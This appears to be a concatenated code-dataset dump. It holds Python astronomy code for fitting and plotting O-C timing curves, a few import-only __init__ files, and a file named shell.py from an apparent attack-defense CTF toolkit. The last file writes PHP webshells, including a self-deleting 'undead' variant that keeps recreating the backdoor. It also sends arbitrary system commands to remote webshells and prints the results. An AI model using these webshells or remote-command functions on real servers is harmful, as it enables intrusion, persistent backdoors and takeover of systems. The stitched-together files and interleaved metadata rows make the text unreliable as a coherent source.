chi0=sum(((self.oc-model)/self.err)**2) #original chi2 error
alfa=chi0/(n-len(self.fit_params)) #coefficient between old and new errors -> chi2_r = 1
err=self.err*np.sqrt(alfa) #new errors
chi=sum(((self.oc-model)/err)**2) #calculate new chi2 error
print 'New chi2:',chi,chi/(n-len(self.fit_params))
if self._set_err and len(self._old_err)==0: self._old_err=self.err #if errors were given, save old values
self.err=err
self._corr_err=True
return err
def AddWeight(self,weight):
'''adding weight of input data + scaling according to current model
warning: weights have to be in same order as input date!'''
if not len(weight)==len(self.t):
#if wrong length of given weight array
print 'incorrect length of "w"!'
return
weight=np.array(weight)
err=1./weight[self._order] #transform to errors and change order according to order of input data
n=len(self.t) #number of data points
model=self.Model(self.t,self.params) #calculate model values
chi0=sum(((self.oc-model)/err)**2) #original chi2 error
alfa=chi0/(n-len(self.fit_params)) #coefficient between old and new errors -> chi2_r = 1
err*=np.sqrt(alfa) #new errors
chi=sum(((self.oc-model)/err)**2) #calculate new chi2 error
print 'New chi2:',chi,chi/(n-len(self.fit_params))
self._calc_err=True
self._set_err=False
self.err=err
return err
def Plot(self,name=None,no_plot=0,no_plot_err=0,params=None,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,model2=False,with_res=False,
bw=False,double_ax=False,legend=None,fig_size=None):
'''plotting original O-C with model O-C based on current parameters set
name - name of file to saving plot (if not given -> show graph)
no_plot - number of outlier point which will not be plot
no_plot_err - number of errorful point which will not be plot
params - set of params of current model (if not given -> current parameters set)
eps - save also as eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which is time (show in x label)
offset - offset of time
trans - transform time according to offset
title - name of graph
epoch - x axis in epoch
min_type - distinction of type of minimum
weight - weight of data (shown as size of points)
trans_weight - transform weights to range (1,10)
model2 - plot 2 model O-Cs - current params set and set given in "params"
with_res - common plot with residue
bw - Black&White plot
double_ax - two axes -> time and epoch
legend - labels for data and model(s) - give '' if no show label, 2nd model given in "params" is the last
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in same order as input data!
'''
if epoch:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
if model2:
if params is None:
raise ValueError('Parameters set for 2nd model not given!')
params_model=dict(params)
params=self.params
if params is None: params=self.params
if legend is None:
legend=['','','']
show_legend=False
else: show_legend=True
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
#2 plots - for residue
if with_res:
gs=gridspec.GridSpec(2,1,height_ratios=[4,1])
ax1=fig.add_subplot(gs[0])
ax2=fig.add_subplot(gs[1],sharex=ax1)
else:
ax1=fig.add_subplot(1,1,1)
ax2=ax1
ax1.yaxis.set_label_coords(-0.11,0.5)
#setting labels
if epoch and not double_ax:
ax2.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax2.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax2.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('O - C (min)')
k=minutes
else:
ax1.set_ylabel('O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
model=self.Model(self.t,params)
self.res=self.oc-model
#primary / secondary minimum
if min_type:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
prim=np.where(self._min_type==0)
sec=np.where(self._min_type==1)
else:
prim=np.arange(0,len(self.t),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
warnings.warn('Shape of "weight" is different to shape of "time". Weight will be ignore!')
errors=GetMax(abs(model-self.oc),no_plot) #remove outlier points
if bw: color='k'
else: color='b'
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
ax1.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.oc*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i],label=legend[0],zorder=1)
if not len(sec)==0:
for i in range(len(w)):
ax1.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.oc*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color,label=legend[0],zorder=1)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err)) #remove errorful points
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.errorbar(x[prim],(self.oc*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5,label=legend[0],zorder=1)
if not len(sec)==0:
ax1.errorbar(x[sec],(self.oc*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
fillstyle='none',markeredgewidth=1,markeredgecolor=color,label=legend[0],zorder=1)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.plot(x[prim],(self.oc*k)[prim],color+'o',label=legend[0],zorder=1)
if not len(sec)==0:
ax1.plot(x[sec],(self.oc*k)[sec],color+'o',label=legend[0],
mfc='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
#expand time interval for model O-C
if len(self.t)<1000:
if 't0' in params:
old_epoch=self.epoch
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
t1=params['t0']+params['P']*E
self.epoch=E
elif epoch:
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
t1=self._t0P[0]+self._t0P[1]*E
else:
dt=(self.t[-1]-self.t[0])/1000.
t1=np.linspace(self.t[0]-50*dt,self.t[-1]+50*dt,1100)
else:
if 't0' in params:
old_epoch=self.epoch
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
t1=params['t0']+params['P']*E
self.epoch=E
elif epoch:
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
t1=self._t0P[0]+self._t0P[1]*E
else:
dt=(self.t[-1]-self.t[0])/len(self.t)
t1=np.linspace(self.t[0]-0.05*len(self.t)*dt,self.t[-1]+0.05*len(self.t)*dt,int(1.1*len(self.t)))
if bw:
color='k'
lw=2
else:
color='r'
lw=1
if self.model=='Apsidal':
#primary
model_long=self.Model(t1,params,min_type=np.zeros(t1.shape))
if epoch and not double_ax: ax1.plot(E,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else: ax1.plot(t1-offset,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
#secondary
model_long=self.Model(t1,params,min_type=np.ones(t1.shape))
if epoch and not double_ax: ax1.plot(E,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else: ax1.plot(t1-offset,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else:
model_long=self.Model(t1,params)
if epoch and not double_ax: ax1.plot(E,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
else: ax1.plot(t1-offset,model_long*k,color,linewidth=lw,label=legend[1],zorder=2)
if model2:
#plot second model
if bw:
color='k'
lt='--'
else:
color='g'
lt='-'
model_set=self.Model(t1,params_model)
if epoch and not double_ax: ax1.plot(E,model_set*k,color+lt,linewidth=lw,label=legend[2],zorder=3)
else: ax1.plot(t1-offset,model_set*k,color+lt,linewidth=lw,label=legend[2],zorder=3)
if show_legend: ax1.legend()
if 't0' in params: self.epoch=old_epoch
if double_ax:
#setting secound axis
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
ax3=ax1.twiny()
#generate plot to obtain correct axis in epoch
#expand time interval for model O-C
if len(self.t)<1000:
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
else:
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
l=ax3.plot(E,model_long*k)
ax3.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self._t0P[0])/self._t0P[1]*2)/2.
ax3.set_xlim(epoch)
if with_res:
#plot residue
if bw: color='k'
else: color='b'
if oc_min: ax2.set_ylabel('Residue (min)')
else: ax2.set_ylabel('Residue (d)')
ax2.yaxis.set_label_coords(-0.1,0.5)
m=round(abs(max(-min(self.res),max(self.res)))*k,2)
ax2.set_autoscale_on(False)
ax2.set_ylim([-m,m])
ax2.yaxis.set_ticks(np.array([-m,0,m]))
ax2.plot(x,self.res*k,color+'o')
ax2.xaxis.labelpad=15
ax2.yaxis.labelpad=15
mpl.subplots_adjust(hspace=.07)
mpl.setp(ax1.get_xticklabels(),visible=False)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
def PlotRes(self,name=None,no_plot=0,no_plot_err=0,params=None,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,bw=False,double_ax=False,
fig_size=None):
'''plotting residue (new O-C)
name - name of file to saving plot (if not given -> show graph)
no_plot - count of outlier point which will not be plot
no_plot_err - count of errorful point which will not be plot
params - set of params of current model (if not given -> current parameters set)
eps - save also as eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which is time (show in x label)
offset - offset of time
trans - transform time according to offset
title - name of graph
epoch - x axis in epoch
min_type - distinction of type of minimum
weight - weight of data (shown as size of points)
trans_weight - transform weights to range (1,10)
bw - Black&White plot
double_ax - two axes -> time and epoch
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in same order as input data!
'''
if epoch:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
if params is None: params=self.params
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
ax1=fig.add_subplot(1,1,1)
ax1.yaxis.set_label_coords(-0.11,0.5)
#setting labels
if epoch and not double_ax:
ax1.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax1.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax1.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('Residue O - C (min)')
k=minutes
else:
ax1.set_ylabel('Residue O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
model=self.Model(self.t,params)
self.res=self.oc-model
#primary / secondary minimum
if min_type:
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
prim=np.where(self._min_type==0)
sec=np.where(self._min_type==1)
else:
prim=np.arange(0,len(self.t),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
warnings.warn('Shape of "weight" is different to shape of "time". Weight will be ignore!')
errors=GetMax(abs(self.res),no_plot) #remove outlier points
if bw: color='k'
else: color='b'
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
mpl.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.res*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i])
if not len(sec)==0:
for i in range(len(w)):
mpl.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.res*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err)) #remove errorful points
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
mpl.errorbar(x[prim],(self.res*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5)
if not len(sec)==0:
mpl.errorbar(x[sec],(self.res*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
mpl.plot(x[prim],(self.res*k)[prim],color+'o')
if not len(sec)==0:
mpl.plot(x[sec],(self.res*k)[sec],color+'o',
mfc='none',markeredgewidth=1,markeredgecolor=color)
if double_ax:
#setting secound axis
if not len(self.epoch)==len(self.t):
raise NameError('Epoch not callculated! Run function "Epoch" before it.')
ax2=ax1.twiny()
#generate plot to obtain correct axis in epoch
l=ax2.plot(self.epoch,self.res*k)
ax2.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self._t0P[0])/self._t0P[1]*2)/2.
ax2.set_xlim(epoch)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
def SaveModel(self,name,E_min=None,E_max=None,n=1000,params=None,t0=None,P=None):
'''save model curve of O-C to file
name - name of output file
E_min - minimal value of epoch
E_max - maximal value of epoch
n - number of data points
params - parameters of model (if not given, used "params" from class)
t0 - time of zeros epoch (necessary if not given in model or epoch not calculated)
P - period (necessary if not given in model or epoch not calculated)
'''
if params is None: params=self.params
#get linear ephemeris
if 't0' in params: t0=params['t0']
elif len(self.epoch)==len(self.t): t0=self._t0P[0]
elif t0 is None: raise TypeError('t0 is not given!')
if 'P' in params: P=params['P']
elif len(self.epoch)==len(self.t): P=self._t0P[1]
elif P is None: raise TypeError('P is not given!')
old_epoch=self.epoch
if not len(self.epoch)==len(self.t): self.Epoch(t0,P)
#same interval of epoch like in plot
if len(self.epoch)<1000: dE=50*(self.epoch[-1]-self.epoch[0])/1000.
else: dE=0.05*(self.epoch[-1]-self.epoch[0])
if E_min is None: E_min=min(self.epoch)-dE
if E_max is None: E_max=max(self.epoch)+dE
self.epoch=np.linspace(E_min,E_max,n)
t=t0+P*self.epoch
if self.model=='Apsidal':
typeA=np.append(np.zeros(t.shape),np.ones(t.shape))
t=np.append(t,t)
self.epoch=np.append(self.epoch,self.epoch)
i=np.argsort(np.append(np.arange(0,len(t),2),np.arange(1,len(t),2)))
t=t[i]
typeA=typeA[i]
self.epoch=self.epoch[i]
model=self.Model(t,params,min_type=typeA)
f=open(name,'w')
np.savetxt(f,np.column_stack((t+model,self.epoch,model,typeA)), fmt=["%14.7f",'%10.3f',"%+12.10f","%1d"]
,delimiter=' ',header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')+' model O-C'.ljust(13,' ')+' type')
f.close()
else:
model=self.Model(t,params)
f=open(name,'w')
np.savetxt(f,np.column_stack((t+model,self.epoch,model)),fmt=["%14.7f",'%10.3f',"%+12.10f"]
,delimiter=' ',header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' model O-C')
f.close()
self.epoch=old_epoch
def SaveRes(self,name,params=None,t0=None,P=None,weight=None):
'''save residue to file
name - name of output file
params - parameters of model (if not given, used "params" from class)
t0 - time of zeros epoch (necessary if not given in model or epoch not calculated)
P - period (necessary if not given in model or epoch not calculated)
weight - weights of input data points
warning: weights have to be in same order as input date!
'''
if params is None: params=self.params
#get linear ephemeris
if 't0' in params: t0=params['t0']
elif len(self.epoch)==len(self.t): t0=self._t0P[0]
elif t0 is None: raise TypeError('t0 is not given!')
if 'P' in params: P=params['P']
elif len(self.epoch)==len(self.t): P=self._t0P[1]
elif P is None: raise TypeError('P is not given!')
old_epoch=self.epoch
if not len(self.epoch)==len(self.t): self.Epoch(self.t,t0,P)
model=self.Model(self.t,params)
self.res=self.oc-model
f=open(name,'w')
if self._set_err:
if self._corr_err: err=self._old_err
else: err=self.err
np.savetxt(f,np.column_stack((self.t,self.epoch,self.res,err)),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(10,' ')+' Error')
elif weight is not None:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.res,np.array(weight)[self._order])),
fmt=["%14.7f",'%10.3f',"%+12.10f","%.10f"],delimiter=" ",
header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' '+'new O-C'.ljust(12,' ')+' Weight')
else:
np.savetxt(f,np.column_stack((self.t,self.epoch,self.res)),
fmt=["%14.7f",'%10.3f',"%+12.10f"],delimiter=" ",
header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' new O-C')
f.close()
self.epoch=old_epoch
class OCFitLoad(OCFit):
'''loading saved data, model... from OCFit class'''
def __init__(self,path):
'''loading data, model, parameters... from file'''
self._order=[]
self.t=[] #times
self.oc=[] #O-Cs
self.err=[] #errors
self._set_err=False
self.limits={} #limits of parameters for fitting
self.steps={} #steps (width of normal distibution) of parameters for fitting
self.params={} #values of parameters, fixed values have to be set here
self.params_err={} #errors of fitted parameters
self.paramsMore={} #values of parameters calculated from model params
self.paramsMore_err={} #errors of calculated parameters
self.fit_params=[] #list of fitted parameters
self._calc_err=False #errors were calculated
self._corr_err=False #errors were corrected
self._old_err=[] #given errors
self.model='LiTE3' #used model of O-C
self._t0P=[] #linear ephemeris of binary
self.epoch=[] #epoch of binary
self.res=[] #residua = new O-C
self._min_type=[] #type of minima (primary=0 / secondary=1)
self.availableModels=['LiTE3','LiTE34','LiTE3Quad','LiTE34Quad',\
'AgolInPlanet','AgolInPlanetLin','AgolExPlanet',\
'AgolExPlanetLin','Apsidal'] #list of available models
self.Load(path)
| 42.987189 | 200 | 0.527678 | 16,749 | 117,441 | 3.631142 | 0.048301 | 0.037489 | 0.031307 | 0.00855 | 0.800783 | 0.762439 | 0.736509 | 0.715857 | 0.694811 | 0.673666 | 0 | 0.040658 | 0.322085 | 117,441 | 2,731 | 201 | 43.002929 | 0.723243 | 0.082416 | 0 | 0.621767 | 0 | 0 | 0.056855 | 0.001571 | 0.005927 | 0 | 0 | 0 | 0 | 0 | null | null | 0.000539 | 0.008082 | null | null | 0.010776 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0034def974416db2f7cda324dc24b8c3281f73c2 | 138 | py | Python | dense/fc_densenet/__init__.py | ibrahimgh25/EL-GAN-Implementation | bff0766e682a6441bb27b3a3aa5cf136202564b5 | [
"MIT"
] | 4 | 2021-09-07T10:03:48.000Z | 2022-03-11T19:11:00.000Z | dense/fc_densenet/__init__.py | ibrahimgh25/EL-GAN-Implementation | bff0766e682a6441bb27b3a3aa5cf136202564b5 | [
"MIT"
] | null | null | null | dense/fc_densenet/__init__.py | ibrahimgh25/EL-GAN-Implementation | bff0766e682a6441bb27b3a3aa5cf136202564b5 | [
"MIT"
] | null | null | null | from .fc_densenet import FCDenseNet
from .transition_up import TransitionUp, CenterCropConcat
from .transition_down import TransitionDown
| 34.5 | 57 | 0.876812 | 16 | 138 | 7.375 | 0.6875 | 0.237288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094203 | 138 | 3 | 58 | 46 | 0.944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc69088671d22a3632f7296b2476e02cdebad808 | 26 | py | Python | autorch/transferlearning/__init__.py | skywalker0803r/autorch | b71adb2c010556d4e7895304e46a1545a347ffa6 | [
"MIT"
] | null | null | null | autorch/transferlearning/__init__.py | skywalker0803r/autorch | b71adb2c010556d4e7895304e46a1545a347ffa6 | [
"MIT"
] | null | null | null | autorch/transferlearning/__init__.py | skywalker0803r/autorch | b71adb2c010556d4e7895304e46a1545a347ffa6 | [
"MIT"
] | null | null | null | from .wadda import WADDA
| 8.666667 | 24 | 0.769231 | 4 | 26 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 26 | 2 | 25 | 13 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc725c5e8e35a2ad056e66e6ffc692bf416ab421 | 21 | py | Python | detector/__init__.py | TropComplique/single-shot-detector | 3714d411305f1a55bebb7e38ee58dfea70aa328d | [
"MIT"
] | 17 | 2018-02-19T08:45:39.000Z | 2021-05-14T10:59:05.000Z | detector/__init__.py | lly8752/single-shot-detector | 3714d411305f1a55bebb7e38ee58dfea70aa328d | [
"MIT"
] | 4 | 2018-02-19T07:40:06.000Z | 2020-03-19T12:31:13.000Z | detector/__init__.py | lly8752/single-shot-detector | 3714d411305f1a55bebb7e38ee58dfea70aa328d | [
"MIT"
] | 7 | 2018-12-11T14:39:24.000Z | 2020-08-07T09:34:52.000Z | from .ssd import SSD
| 10.5 | 20 | 0.761905 | 4 | 21 | 4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 21 | 1 | 21 | 21 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4e12e6a96903de0351b286b9705bb40f1a3289ce | 283 | py | Python | vega/modules/arch/__init__.py | jie311/vega | 1bba6100ead802697e691403b951e6652a99ccae | [
"MIT"
] | 724 | 2020-06-22T12:05:30.000Z | 2022-03-31T07:10:54.000Z | vega/modules/arch/__init__.py | jie311/vega | 1bba6100ead802697e691403b951e6652a99ccae | [
"MIT"
] | 147 | 2020-06-30T13:34:46.000Z | 2022-03-29T11:30:17.000Z | vega/modules/arch/__init__.py | jie311/vega | 1bba6100ead802697e691403b951e6652a99ccae | [
"MIT"
] | 160 | 2020-06-29T18:27:58.000Z | 2022-03-23T08:42:21.000Z | from .architecture import transform_architecture
from .combiner import ConnectionsArchParamsCombiner
from .prune_arch import Conv2dPruneArchitecture, BatchNorm2dPruneArchitecture
from .double_channels_arch import Conv2dDoubleChannelArchitecture, BatchNorm2dDoubleChannelArchitecture
| 56.6 | 103 | 0.915194 | 22 | 283 | 11.590909 | 0.636364 | 0.078431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015094 | 0.063604 | 283 | 4 | 104 | 70.75 | 0.94717 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9d96b97d553e5f5b29fba5f69fe20be2784f78e8 | 3,120 | py | Python | awdphpspear/shell.py | hillmanyoung/AWD | 6abe8f96c1b457a22f0bb15ca6ed901e922fc38c | [
"MIT"
] | 146 | 2019-07-05T12:36:33.000Z | 2021-12-05T18:20:26.000Z | awdphpspear/shell.py | ZacharyZcR/AWD- | 6abe8f96c1b457a22f0bb15ca6ed901e922fc38c | [
"MIT"
] | null | null | null | awdphpspear/shell.py | ZacharyZcR/AWD- | 6abe8f96c1b457a22f0bb15ca6ed901e922fc38c | [
"MIT"
] | 36 | 2019-07-05T12:38:21.000Z | 2021-05-26T11:44:13.000Z | import requests
import os
def shell_gen():
choose = raw_input('[+]1.Normal Shell.2.Undead Shell.3.Memory Shell.')
if choose == '1':
try:
payload = '<?php '
payload += '@eval($_POST[a]);@system($_POST[b]);'
payload += '?>'
file = open('shell.php',"a")
file.write(payload)
file.close()
print "[+]Succeed."
except:
print "[-]Failed."
if choose == '2':
try:
payload = '<?php '
payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
payload += "'"
payload += "shell.php"
payload += "'"
payload += ';$code='
payload += "'"
payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
payload += "'"
payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
payload += '?>'
file = open('shell.php',"a")
file.write(payload)
file.close()
print "[+]Succeed."
except:
print "[-]Failed."
if choose == '3':
try:
payload = '<?php '
payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
payload += ''
payload += 'while(1){php @eval($_POST[a]);@system($_POST[b]);usleep(5000);}'
payload += '?>'
file = open('shell.php',"a")
file.write(payload)
file.close()
print "[+]Succeed."
except:
print "[-]Failed."
def rce(address,password,method):
while 1:
command = raw_input('Command(Input stop to exit):')
if command == 'stop':
break
if method == 'get':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.get(address,params=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
print "*******************************************************"
if method == 'post':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.post(address,data=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
print "*******************************************************"
def batch_rce(address,password,method,command):
if method == 'get':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.get(address,params=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
print "*******************************************************"
if method == 'post':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.post(address,data=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
print "*******************************************************" | 30 | 81 | 0.441667 | 297 | 3,120 | 4.545455 | 0.208754 | 0.02963 | 0.059259 | 0.059259 | 0.737037 | 0.737037 | 0.737037 | 0.682963 | 0.682963 | 0.682963 | 0 | 0.007405 | 0.177564 | 3,120 | 104 | 82 | 30 | 0.518706 | 0 | 0 | 0.782178 | 0 | 0.009901 | 0.423262 | 0.307914 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.059406 | 0.019802 | null | null | 0.29703 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
9dce8d1503ef17db6b55516a6af14137551f1317 | 228 | py | Python | src/coalescenceml/integrations/xgboost/producers/__init__.py | bayoumi17m/CoalescenceML | 0ffa6cc88e6d1d98fe16572e6f509d5d3be09501 | [
"Apache-2.0"
] | 1 | 2022-03-22T17:48:55.000Z | 2022-03-22T17:48:55.000Z | src/coalescenceml/integrations/xgboost/producers/__init__.py | bayoumi17m/CoalescenceML | 0ffa6cc88e6d1d98fe16572e6f509d5d3be09501 | [
